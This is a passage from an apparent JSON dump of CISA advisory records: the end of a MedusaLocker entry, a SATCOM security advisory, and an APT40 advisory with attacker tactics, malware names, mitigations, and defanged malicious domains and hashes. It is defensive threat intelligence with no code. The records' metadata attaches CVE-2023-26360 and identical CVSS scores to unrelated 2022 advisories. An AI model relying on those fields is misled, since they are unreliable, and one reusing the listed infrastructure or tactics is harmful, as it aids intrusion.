for the activity; the name of the submitting company or organization; and a designated point of contact. To report incidents and anomalous activity or to request incident response resources or technical assistance related to this threat, contact CISA at [report@cisa.gov](<mailto:report@cisa.gov>).\n\n### Revisions\n\nJune 30, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2022-08-11T12:00:00", "type": "ics", "title": "#StopRansomware: MedusaLocker", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2022-08-11T12:00:00", "id": "AA22-181A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-181a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:56:06", "description": "### Summary\n\n_Updated May 10, 2022: The U.S. government attributes this threat activity to Russian state-sponsored malicious cyber actors. Additional information may be found in a [statement from the State Department](<https://www.state.gov/attribution-of-russias-malicious-cyber-activity-against-ukraine/>). For more information on Russian malicious cyber activity, refer to [cisa.gov/uscert/russia](<https://www.cisa.gov/uscert/russia>)._\n\n_Actions to Take Today:_ \n\u2022 Use secure methods for authentication. \n\u2022 Enforce principle of least privilege. \n\u2022 Review trust relationships. \n\u2022 Implement encryption. \n\u2022 Ensure robust patching and system configuration audits. \n\u2022 Monitor logs for suspicious activity. \n\u2022 Ensure incident response, resilience, and continuity of operations plans are in place.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are aware of possible threats to U.S. and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers\u2019 customer environments.\n\nGiven the current geopolitical situation, CISA\u2019s [Shields Up](<https://www.cisa.gov/shields-up>) initiative requests that all organizations significantly lower their threshold for reporting and sharing indications of malicious cyber activity. To that end, CISA and FBI will update this joint Cybersecurity Advisory (CSA) as new information becomes available so that SATCOM providers and their customers can take additional mitigation steps pertinent to their environments.\n\nCISA and FBI strongly encourages critical infrastructure organizations and other organizations that are either SATCOM network providers or customers to review and implement the mitigations outlined in this CSA to strengthen SATCOM network cybersecurity.\n\nClick here for a PDF version of this report.\n\n### Mitigations\n\nCISA and FBI strongly encourages critical infrastructure organizations and other organizations that are either SATCOM network providers or customers to review and implement the following mitigations:\n\n#### **Mitigations for SATCOM Network Providers**\n\n * Put in place **additional monitoring at ingress and egress points** to SATCOM equipment to look for anomalous traffic, such as: \n * The presence of insecure remote access tools\u2014such as Teletype Network Protocol (Telnet), File Transfer Protocol (FTP), Secure Shell Protocol (SSH), Secure Copy Protocol (SCP), and Virtual Network Computing (VNC)\u2014facilitating communications to and from SATCOM terminals.\n * Network traffic from SATCOM networks to other unexpected network segments.\n * Unauthorized use of local or backup accounts within SATCOM networks.\n * Unexpected SATCOM terminal to SATCOM terminal traffic.\n * Network traffic from the internet to closed group SATCOM networks.\n * Brute force login attempts over SATCOM network segments.\n * See the Office of the Director of National Intelligence (ODNI) [Annual Threat Assessment of the U.S. Intelligence Community, February 2022](<https://www.dni.gov/files/ODNI/documents/assessments/ATA-2022-Unclassified-Report.pdf>) for specific state-sponsored cyber threat activity relating to SATCOM networks.\n\n#### **Mitigations for SATCOM Network Providers and Customers**\n\n * **Use secure methods for authentication,** including multifactor authentication where possible, for all accounts used to access, manage, and/or administer SATCOM networks. \n * Use and enforce strong, complex passwords: Review password policies to ensure they align with the [latest NIST guidelines](<https://csrc.nist.gov/publications/detail/sp/800-63b/final>). \n * **Do not use default credentials or weak passwords.**\n * Audit accounts and credentials: remove terminated or unnecessary accounts; change expired credentials.\n * **Enforce principle of least privilege through authorization policies.** Minimize unnecessary privileges for identities. Consider privileges assigned to individual personnel accounts, as well as those assigned to non-personnel accounts (e.g., those assigned to software or systems). Account privileges should be clearly defined, narrowly scoped, and regularly audited against usage patterns.\n * **Review trust relationships. **Review existing trust relationships with IT service providers. Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data. \n * Remove unnecessary trust relationships. \n * Review contractual relationships with all service providers. Ensure contracts include appropriate provisions addressing security, such as those listed below, and that these provisions are appropriately leveraged: \n * Security controls the customer deems appropriate. \n * Provider should have in place appropriate monitoring and logging of provider-managed customer systems.\n * Customer should have in place appropriate monitoring of the service provider\u2019s presence, activities, and connections to the customer network.\n * Notification of confirmed or suspected security events and incidents occurring on the provider\u2019s infrastructure and administrative networks.\n * **Implement independent encryption** across all communications links leased from, or provided by, your SATCOM provider. See National Security Agency (NSA) Cybersecurity Advisory: [Protecting VSAT Communications](<https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2910409/nsa-issues-recommendations-to-protect-vsat-communications/>) for guidance.\n * Strengthen the security of **operating systems, software, and firmware.**\n * Ensure robust **vulnerability management and patching** practices are in place and, after testing, immediately patch known exploited vulnerabilities included in CISA's [living catalog of known exploited vulnerabilities](<https://cisa.gov/known-exploited-vulnerabilities>). These vulnerabilities carry significant risk to federal agencies as well as public and private sectors entities. \n * Implement rigorous **configuration management programs.** Ensure the programs can track and mitigate emerging threats. Regularly audit system configurations for misconfigurations and security weaknesses.\n * **Monitor network logs for suspicious activity** and unauthorized or unusual login attempts. \n * Integrate SATCOM traffic into existing network security monitoring tools.\n * Review logs of systems behind SATCOM terminals for suspicious activity.\n * Ingest system and network generated logs into your enterprise security information and event management (SIEM) tool. \n * Implement endpoint detection and response (EDR) tools where possible on devices behind SATCOM terminals, and ingest into the SIEM.\n * Expand and enhance monitoring of network segments and assets that use SATCOM.\n * Expand monitoring to include ingress and egress traffic transiting SATCOM links and monitor for suspicious or anomalous network activity. \n * Baseline SATCOM network traffic to determine what is normal and investigate deviations, such as large spikes in traffic.\n * Create, maintain, and exercise a **cyber incident response plan, resilience plan**, and continuity of operations plan so that critical functions and operations can be kept running if technology systems\u2014including SATCOM networks\u2014are disrupted or need to be taken offline.\n\n### Contact Information\n\nAll organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870 and/or to the FBI via your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI\u2019s 24/7 CyWatch at (855) 292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>).\n\n### Resources\n\n * National Security Agency (NSA) Cybersecurity Advisory: [Protecting VSAT Communications](<https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2910409/nsa-issues-recommendations-to-protect-vsat-communications/>)\n * NSA Cybersecurity Technical Report: [Network Infrastructure Security Guidance](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/2949885/nsa-details-network-infrastructure-best-practices/>)\n * Office of the Director of National Intelligence (ODNI): [Annual Threat Assessment of the U.S. Intelligence Community, February 2022](<https://www.dni.gov/files/ODNI/documents/assessments/ATA-2022-Unclassified-Report.pdf>)\n * CISA Tip: [Choosing and Protecting Passwords ](<https://www.cisa.gov/uscert/ncas/tips/ST04-002>)\n * CISA Capacity Enhancement Guide: [Implementing Strong Authentication](<https://www.cisa.gov/capacity-enhancement-guides-federal-agencies>)\n\n### Revisions\n\nMarch 17, 2022: Initial Version |May 10, 2022: Added Atrribution\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2022-05-10T12:00:00", "type": "ics", "title": "Strengthening Cybersecurity of SATCOM Network Providers and Customers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2022-05-10T12:00:00", "id": "AA22-076A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-076a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:00:11", "description": "### Summary\n\nThis Joint Cybersecurity Advisory was written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) to provide information on a Chinese Advanced Persistent Threat (APT) group known in open-source reporting as APT40. This advisory provides APT40\u2019s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help cybersecurity practitioners identify and remediate APT40 intrusions and established footholds.\n\nAPT40\u2014aka BRONZE MOHAWK, FEVERDREAM, G0065, Gadolinium, GreenCrash, Hellsing, Kryptonite Panda, Leviathan, MUDCARP, Periscope, Temp.Periscope, and Temp.Jumper\u2014is located in Haikou, Hainan Province, People\u2019s Republic of China (PRC), and has been active since at least 2009. APT40 has targeted governmental organizations, companies, and universities in a wide range of industries\u2014including biomedical, robotics, and maritime research\u2014across the United States, Canada, Europe, the Middle East, and the South China Sea area, as well as industries included in China\u2019s Belt and Road Initiative.\n\nOn July 19, 2021, the U.S. Department of Justice (DOJ) unsealed an indictment against four APT40 cyber actors for their illicit computer network exploitation (CNE) activities via front company Hainan Xiandun Technology Development Company (Hainan Xiandun). Hainan Xiandun employee Wu Shurong cooperated with and carried out orders from PRC Ministry of State Security (MSS) Hainan State Security Department (HSSD) intelligence officers Ding Xiaoyang, Zhu Yunmin, and Cheng Qingmin to conduct CNE. Wu\u2019s CNE activities resulted in the theft of trade secrets, intellectual property, and other high-value information from companies and organizations in the United States and abroad, as well as from multiple foreign governments. These MSS-affiliated actors targeted victims in the following industries: academia, aerospace/aviation, biomedical, defense industrial base, education, government, healthcare, manufacturing, maritime, research institutes, and transportation (rail and shipping).\n\nClick here for a PDF version of this report.\n\n_(Updated July 19, 2021)_\n\nClick here for indicators of compromise (IOCs) in STIX format. **Note:** to uncover malicious activity, incident responders search for IOCs in network- and host-based artifacts and assess the results\u2014eliminating false positives during the assessment. For example, some MD5 IOCs in the STIX file identify legitimate tools\u2014such as Putty, cmd.exe, svchost.exe, etc.\u2014as indicators of compromise. Although the tools themselves are not malicious, APT40 attackers placed and used them from non-standard folders on victim systems during computer intrusion activity. If a legitimate tool is identified by an incident responder, then the location of the tool should be assessed to eliminate false positives or to uncover malicious activity. See [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more incident handling guidance.\n\n### Technical Details\n\n_This Joint Cybersecurity Advisory uses the MITRE ATT&amp;CK\u00ae framework, version 9. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor tactics and techniques._\n\nAPT40 [[G0065](<https://attack.mitre.org/groups/G0065/>)] has used a variety of tactics and techniques and a large library of custom and open-source malware\u2014much of which is shared with multiple other suspected Chinese groups\u2014to establish initial access via user and administrator credentials, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. Table 1 provides details on these tactics and techniques. **Note:** see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity.\n\n_Table 1: APT40 ATT&amp;CK Tactics and Techniques_\n\n**Tactics** | **Activities and Techniques** \n---|--- \n_ Reconnaissance_ [[TA0043]](<https://attack.mitre.org/versions/v9/tactics/TA0043/>) \nand \n_ Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042/>)] | \n\n * Gathered victim identity information [[T1589](<https://attack.mitre.org/versions/v9/techniques/T1589/>)] by collecting compromised credentials [[T1589.001](<https://attack.mitre.org/versions/v9/techniques/T1589/001/>)] \n * Acquire infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)] to establish domains that impersonate legitimate entities [[T1583.001](<https://attack.mitre.org/versions/v9/techniques/T1583/001>)], aka \u2018typosquatting\u2019, to use in watering hole attacks and as command and control (C2) [[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)] infrastructure\n * Establish new [[T1585.002](<https://attack.mitre.org/versions/v9/techniques/T1585/002>)] and compromise existing [[T1586.002](<https://attack.mitre.org/versions/v9/techniques/T1586/002>)] email and social media accounts [[1585.001](<https://attack.mitre.org/versions/v9/techniques/T1585/001>)] to conduct social engineering attacks \n_ Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)] | \n\n * External remote services (e.g., virtual private network [VPN] services) [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n * Spearphishing emails with malicious attachments [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] and links [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n * Drive-by compromises [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)] and exploitation of public-facing applications [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n * Access to valid [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)], compromised administrative [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)] accounts \n_ Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)] | \n\n * Command and scripting interpreters [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)] such as PowerShell [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001/>)]\n * Exploitation of software vulnerabilities in client applications to execute code [[T1203](<https://attack.mitre.org/versions/v9/techniques/T1203/>)] using lure documents that dropped malware exploiting various Common Vulnerabilities and Exposures (CVEs)\n * User execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204/>)] of malicious files [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002/>)] and links [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)] attached to spearphishing emails [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n_ Persistence _[[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]_, \nPrivilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]_, \nCredential Access _[[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006/>)]_, \nDiscovery _[[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]_,_ \nand \n_ Lateral Movement _[[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)] | \n\nAPT40 has used a combination of tool frameworks and malware to establish persistence, escalate privileges, map, and move laterally on victim networks. Additionally, APT40 conducted internal spearphishing attacks [[T1534](<https://attack.mitre.org/versions/v9/techniques/T1534>)].\n\n * BADFLICK/Greencrash\n * China Chopper [[S0020](<https://attack.mitre.org/versions/v9/software/S0020/>)]\n * Cobalt Strike [[S0154](<https://attack.mitre.org/versions/v9/software/S0154/>)]\n * Derusbi/PHOTO [[S0021](<https://attack.mitre.org/versions/v9/software/S0021/>)]\n * Gh0stRAT [[S0032](<https://attack.mitre.org/versions/v9/software/S0032/>)]\n * GreenRAT\n * jjdoor/Transporter\n * jumpkick\n * Murkytop (`mt.exe`) [[S0233](<https://attack.mitre.org/versions/v9/software/S0233/>)]\n * NanHaiShu [[S0228](<https://attack.mitre.org/versions/v9/software/S0228/>)]\n * Orz/AirBreak [[S0229](<https://attack.mitre.org/versions/v9/software/S0229/>)]\n * PowerShell Empire [[S0363](<https://attack.mitre.org/versions/v9/software/S0363/>)]\n * PowerSploit [[S0194](<https://attack.mitre.org/versions/v9/software/S0194/>)]\n * Server software component: Web Shell [[TA1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003/>)] \n_ Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005/>)]_, \nCommand and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]_, \nCollection _[[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]_,_ \nand \n_ Exfiltration _[[TA0010](<https://attack.mitre.org/versions/v9/tactics/TA0010>)] | \n\n * Use of steganography [[T1027.003](<https://attack.mitre.org/versions/v9/techniques/T1027/003>)] to hide stolen data inside other files stored on GitHub\n * Protocol impersonation [[T1001.003](<https://attack.mitre.org/versions/v9/techniques/T1001/003>)] by using Application Programming Interface (API) keys for Dropbox accounts in commands to upload stolen data to make it appear that the activity was a legitimate use of the Dropbox service\n * Protocol tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)] and multi-hop proxies [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)], including the use of Tor [[S0183](<https://attack.mitre.org/versions/v9/software/S0183/>)]\n * Use of domain typosquatting for C2 infrastructure [[T1583.001](<https://attack.mitre.org/versions/v9/techniques/T1583/001>)]\n * Archive [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)], encrypt [[T1532](<https://attack.mitre.org/versions/v9/techniques/T1532>)], and stage collected data locally [[T1074.001](<https://attack.mitre.org/versions/v9/techniques/T1074/001>)] and remotely [[T1074.002] ](<https://attack.mitre.org/versions/v9/techniques/T1074/002>)for exfiltration\n * Exfiltration over C2 channel [[T1041](<https://attack.mitre.org/versions/v9/techniques/T1041>)] \n \n### Mitigations\n\n#### **Network Defense-in-Depth**\n\nProper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk. The following guidance may assist organizations in developing network defense procedures.\n\n##### **_Patch and Vulnerability Management_**\n\n * Install vendor-provided and verified patches on all systems for critical vulnerabilities, prioritizing timely patching of internet-connected servers and software processing internet data\u2014such as web browsers, browser plugins, and document readers.\n * Ensure proper migrating steps or compensating controls are implemented for vulnerabilities that cannot be patched in a timely manner.\n * Maintain up-to-date antivirus signatures and engines.\n * Routinely audit configuration and patch management programs to ensure the ability to track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect resources and information systems.\n * Review the articles in the References section for more information on Chinese APT exploitation of common vulnerabilities.\n\n##### **_Protect Credentials_**\n\n * Strengthen credential requirements, regularly change passwords, and implement multi-factor authentication to protect individual accounts, particularly for webmail and VPN access and for accounts that access critical systems. Do not reuse passwords for multiple accounts. \n * Audit all remote authentications from trusted networks or service providers.\n * Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems.\n * Log use of system administrator commands such as `net`, `ipconfig`, and `ping`.\n * Enforce principle of least privilege.\n\n##### **_Network Hygiene and Monitoring_**\n\n * Actively scan and monitor internet-accessible applications for unauthorized access, modification, and anomalous activities. \n * Actively monitor server disk use and audit for significant changes.\n * Log Domain Name Service (DNS) queries and consider blocking all outbound DNS requests that do not originate from approved DNS servers. Monitor DNS queries for C2 over DNS.\n * Develop and monitor the network and system baselines to allow for the identification of anomalous activity. Audit logs for suspicious behavior.\n * Identify and suspend access of users exhibiting unusual activity.\n * Use allowlist or baseline comparison to monitor Windows event logs and network traffic to detect when a user maps a privileged administrative share on a Windows system.\n * Leverage multi-sourced threat-reputation services for files, DNS, URLs, IP addresses, and email addresses.\n * Network device management interfaces\u2014such as Telnet, Secure Shell (SSH), Winbox, and HTTP\u2014should be turned off for wide area network (WAN) interfaces and secured with strong passwords and encryption when enabled.\n * When possible, segment critical information on air-gapped systems. Use strict access control measures for critical data. \n\n### APPENDIX: APT40 Indicators of Compromise\n\nAPT40 used the following domains, file names, and malware MD5 hash values to facilitate the CNE activity outlined in this CSA between 2009 through 2018.\n\n#### **Domains**\n\nairbusocean[.]com | https://pastebin[.]com/vfb5mbbu | pacifichydrologic[.]org \n---|---|--- \ncargillnotice[.]com | huntingtomingalls[.]com | philippinenewss[.]com \nccidmeekparry[.]info | indiadigest[.]in | philstarnotice[.]com \nccvzvhjhdf[.]website | jack-newnb[.]com | porndec143.chickenkiller[.]com \ncdigroups[.]com | kAty197.chickenkiller[.]com | santaclarasystem[.]us \ncheckecc[.]com | louisdreyfu[.]com | scsnewstoday[.]com \nchemscalere[.]com | mail2.ignorelist[.]com | secbkav[.]com \ncnnzapmeta[.]com | masterroot[.]pw | Soure7788.chickenkiller[.]com \ncorycs[.]com | microsql-update[.]info | tccoll[.]com \ndeltektimes[.]com | mihybb[.]com | teledynegroup[.]com \nEngaction[.]com | mlcdailynews[.]com | teledyneinstrument[.]com \nens-smithjonathan.rhcloud[.]com | movyaction[.]net | testdomain2019.chickenkiller[.]com \nfishgatesite.wordpress[.]com | msusanode[.]com | thestar[.]live \ngoo2k88yyh2.chickenkiller[.]com | newbb-news[.]com | thrivedataview[.]com \ngttdoskip[.]com | nfmybb[.]com | thyssemkrupp[.]com \nhttp://gkimertds.wordpress[.]com/feed/ | nmw4xhipveaca7hm[.]onion.link/en_US/all.js | thyssenkrupp-marinesystems[.]org \nhttp://stackoverflow[.]com/users/3627469/angle-swift | nobug[.]uk.to | togetno992.mooo[.]com \nhttp://stackoverflow[.]com/users/3804206/swiftr-angle | notesof992.wordpress[.]com | tojenner97.chickenkiller[.]com \nhttp://stackoverflow[.]com/users/3863346/gkimertdssdads | onlinenewspapers[.]club | trafficeco[.]com \nvser.mooo[.]com | onlineobl[.]com | transupdate[.]com \nhttps://pastebin[.]com/p1mktQpD | oyukg43t[.]website | troubledate[.]com \nultrasocial[.]info | wsmcoff[.]com | xbug.uk[.]to \nusdagroup[.]com | www.yorkshire-espana-sa[.]com/english/servicios/ | yootypes[.]com \n| https://github[.]com/slotz/sharp-loader/commit/f9de338fb474fd970a7375030642d04179b9245d | \n \n### \n\n#### **MD5 Malware Hashes**\n\n_(Updated July 19, 2021)_ **Note:** to uncover malicious activity, incident responders search for indicators of compromise (IOCs) in network- and host-based artifacts and assess the results\u2014eliminating false positives during the assessment. For example, some MD5 IOCs in the table below identify legitimate tools\u2014such as PuTTY, cmd.exe, svchost.exe, etc.\u2014as indicators of compromise. Although the tools themselves are not malicious, APT40 attackers placed and used them from non-standard folders on victim systems during computer intrusion activity. If a legitimate tool is identified by an incident responder, then the location of the tool should be assessed to eliminate false positives or to uncover malicious activity. See [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more incident handling guidance.\n\n01234c0e41fc23bb5e1946f69e6c6221\n\n018d3c34a296edd32e1b39b7276dcf7f\n\n019b68e26df8750e2f9f580b150b7293\n\n01fa52a4f9268948b6c508fef0377299\n\n022bd2040ec0476d8eb80d1d9dc5cc92\n\n039d9ca446e79f2f4310dc7dcc60ec55\n\n043f6cdca33ce68b1ebe0fd79e4685af\n\n04918772a2a6ccd049e42be16bcbee39\n\n04dc4ca70f788b10f496a404c4903ac6\n\n060067666435370e0289d4add7a07c3b\n\n062c759d04106e46e027bbe3b93f33ef\n\n07083008885d2d0b31b137e896c7266c\n\n079068181a728d0d603fe72ebfc7e910\n\n0803f8c5ee4a152f2108e64c1e7f0233\n\n09143a14272a29c56ff32df160dfdb30\n\n0985f757b1b51533b6c5cf9b1467f388\n\n09aab083fb399527f8ff3065f7796443\n\n0b7bb3e23a1be2f26b9adf7004fc6b52\n\n0b9a614a2bbc64c1f32b95988e5a3359\n\n0bbe092a2120b1be699387be16b5f8fb\n\n0bbe769505ca3db6016da400539f77aa\n\n0c3c00c01f4c4bad92b5ba56bd5a9598\n\n0c4fa4dfbe0b07d3425fea3efe60be1c\n\n0ca936a564508a1f9c91cb7943e07c30\n\n0d69eefede612493afd16a7541415b95\n\n0da08b4bfe84eacc9a1d9642046c3b3c\n\n0dd7f10fdf60fc36d81558e0c4930984\n\n0e01ec14c25f9732cc47cf6344107672\n\n10191b6ce29b4e2bddb9e57d99e6c471\n\n105757d1499f3790e69fb1a41e372fd9\n\n207e3c538231eb0fd805c1fc137a7b46\n\n20e52d2d1742f3a3caafbac07a8aa99a\n\n226042db47bdd3677bd16609d18930bd\n\n22823fed979903f8dfe3b5d28537eb47\n\n2366918da9a484735ec3a9808296aab8\n\n239a22c0431620dc937bc36476e5e245\n\n2499390148fc99a0f38148655d8059e7\n\n24dbcd8e8e478a35943a05c7adfc87cc\n\n25a06ab7675e8f9e231368d328d95344\n\n25b79ba11f4a22c962fea4a13856da7f\n\n25fc4713290000cdf01d3e7a0cea7cef\n\n2639805ae43e60c8f04955f0fe18391c\n\n270df5aab66c4088f8c9de29ef1524b9\n\n280e5a3b9671db31cf003935c34f8cf9\n\n28366de82d9c4441f82b84246369ad3b\n\n28628f709a23d5c02c91d6445e961645\n\n28c6f235946fd694d2634c7a2f24c1ba\n\n29c1b4ec0bc4e224af2d82c443cce415\n\n2b8a06d1de446db3bbbd712cdb2a70ce\n\n2bf998d954a88b12dbec1ee96b072cb9\n\n2c408385acdb04f0679167223d70192b\n\n2c9737c6922b6ca67bf12729dcf038f9\n\n2dd9aab33fcdd039d3a860f2c399d1b1\n\n2de0e31fda6bc801c86645b37ee6f955\n\n2e5b59c62e6e2f3b180db9453968d817\n\n2ee7168c0cc6e0df13d0f658626474bb\n\n2eee367a6273ce89381d85babeae1576\n\n2f0a52ce4f445c6e656ecebbcaceade5\n\n2f9995bc34452c789005841bc1d8da09\n\n30701b1d1e28107f8bd8a15fcc723110\n\n31a72e3bf5b1d33368202614ffd075db\n\n3389dae361af79b04c9c8e7057f60cc6\n\n33d18e29b4ecc0f14c20c46448523fc8\n\n46e80d49764a4e0807e67101d4c60720\n\n480f3a13998069821e51cda3934cc978\n\n48101bbdd897877cc62b8704a293a436\n\n48548309036005b16544e5f3788561dc\n\n4a23e0f2c6f926a41b28d574cbc6ac30\n\n4ab825dc6dabf9b261ab1cf959bfc15d\n\n4b18b1b56b468c7c782700dd02d621f4\n\n4b93159610aaadbaaf7f60bea69f21a4\n\n4beb3f7fd46d73f00c16b4cc6453dcdb\n\n4dd6eab0fa77adb41b7bd265cfb32013\n\n4e79e2cade96e41931f3f681cc49b60a\n\n4ef1c48197092e0f3dea0e7a9030edc8\n\n503f8dc2235f96242063b52440c5c229\n\n50527c728506a95b657ec4097f819be6\n\n5064dc5915a46bfa472b043be9d0f52f\n\n513f559bf98e54236c1d4379e489b4bc\n\n51e21a697aec4cc01e57264b8bfaf978\n\n51f31ed78cec9dbe853d2805b219e6e7\n\n52b0f7d77192fe6f08b03f0d4ea48e46\n\n53ceeaf0a67239b3bc4b533731fd84af\n\n56a9ff904b78644dee6ef5b27985f441\n\n56b18ba219c8868a5a7b354d60429368\n\n56d6d3aa1297c62c6b0f84e5339a6c22\n\n57849bb3949b73e2cd309900adafc853\n\n5826e0bd3cd907cb24c1c392b42152ca\n\n5875dfe9a15dd558ef51f269dcc407b5\n\n58e7fd4530a212b05481f004e82f7bc1\n\n5957ef4b609ab309ea2f17f03eb78b2d\n\n5984955cbc41b1172ae3a688ab0246c5\n\n59ce71ffb298a5748c3115bc834335bf\n\n5a8d488819f2072caed31ead6aeaf2fc\n\n5acac898428f6d20f6f085d79d86db9c\n\n5b2cddac9ebd7b0cd3f3d3ac15026ffb\n\n6f6d12da9e5cf8b4a7f26e53cc8e9fbd\n\n700d2582ccb35713b7d1272aa7cfc598\n\n70206725df8da51f26d6362e21d8fadb\n\n70e0052d1a2828c3da5ae3c90bc969ea\n\n7204c1f6f1f4698ac99c6350f4611391\n\n72a7fd2b3d1b829a9f01db312fdd1cd7\n\n7327993142260cee445b846a12cf4e85\n\n7525bc47e2828464ce07fa8a0db6844f\n\n76adaa87f429111646a27c2e60bda61e\n\n76c5dca8dc9b1241b8c9a376abab0cc5\n\n782202b09f72b3cfdc93ffb096ca27de\n\n7836c4a36cc66d4bcbd84abb25857d21\n\n78a0af31a5c7e4aee0f9acde74547207\n\n7969dc3c87a3d5e672b05ff2fe93f710\n\n7a09bf329b0b311cc552405a38747445\n\n7a63ea3f49a96fa0b53a84e59f005019\n\n7b3f959ab775032a3ca317ebb52189c4\n\n7b710f9731ad3d6e265ae67df2758d50\n\n7bd10b5c8de94e195b7da7b64af1f229\n\n7c036ba51a3818ddc8d51cf5a6673da4\n\n7c49efe027e489134ec317d54de42def\n\n7d63f39fb0100a51ba6d8553ef4f34de\n\n7ef6802fc9652d880a1f3eaf944ce4a3\n\n7f7d726ea2ed049ab3980e5e5cb278a3\n\n7fe679c2450c5572a45772a96b15fcb1\n\n83076104ae977d850d1e015704e5730a\n\n8361b151c51a7ad032ad20cecf7316f4\n\n838ceb02081ac27de43da56bec20fc76\n\n84865f8f1a2255561175ab12d090da7c\n\n8520062de440b75f65217ff2509120f7\n\n85862c262c087dd4470bb3b055ef8ea5\n\n85e5b11d79a7570c73d3aa96e5a4e84d\n\n85ecef9ca15e25835a9300a85f9bcd2a\n\n9d3fd2ff608e79101b09db9e361ea845\n\n9d5206f692577d583b93f1c3378a7a90\n\